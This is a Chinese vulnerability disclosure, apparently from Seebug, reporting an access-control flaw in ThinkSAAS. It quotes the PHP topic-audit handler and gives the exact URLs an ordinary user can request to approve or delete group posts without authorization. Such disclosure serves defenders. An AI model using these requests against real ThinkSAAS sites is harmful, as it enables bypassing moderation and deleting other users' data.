ThinkSAAS某处平衡权限

### 简要描述： ThinkSAAS某处平衡权限 ### 详细说明： 能够越权审核数据，越权删除数据 ``` //执行审核 case "do": $topicid = intval($_GET['topicid']); $new['group']->update('group_topic',array( 'topicid'=>$topicid, ),array( 'isaudit'=>'0', )); //统计需要审核的帖子 $count_topic_audit = $new['group']->findCount('group_topic',array( 'groupid'=>$groupid, 'isaudit'=>'1', )); // 统计小组下帖子数并更新 $count_topic = $new['group']->findCount('group_topic',array( 'groupid'=>$groupid, )); ``` ### 漏洞证明： 用户发帖默认是不需要审核的，假如管理员不让通过审核，在后台设置了未审核。 这里用户只要执行 http://localhost/thinksaas/index.php?app=group&ac=audit&groupid=1&topicid=1&ts=do 就可以将帖子通过审核 这里的groupid是当前的小组号，topicid是帖子号 同理将ts=delete便可删除该数据 漏洞利用： 注册用户后，发个帖子，后台是未审核的 [<img src="https://images.seebug.org/upload/201403/1016220114f6ad0d2a20c70424c22660cca4c7aa.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1016220114f6ad0d2a20c70424c22660cca4c7aa.png) 用普通注册用户访问http://localhost/thinksaas/index.php?app=group&ac=audit&groupid=1&topicid=3&ts=do [<img src="https://images.seebug.org/upload/201403/101623161e5df52646008d1880c2cc4e45dd0046.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/101623161e5df52646008d1880c2cc4e45dd0046.png) 后台就变成了已经审核过的 [<img src="https://images.seebug.org/upload/201403/10162301857442b559a458c65a570ebb28d6b94f.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/10162301857442b559a458c65a570ebb28d6b94f.png)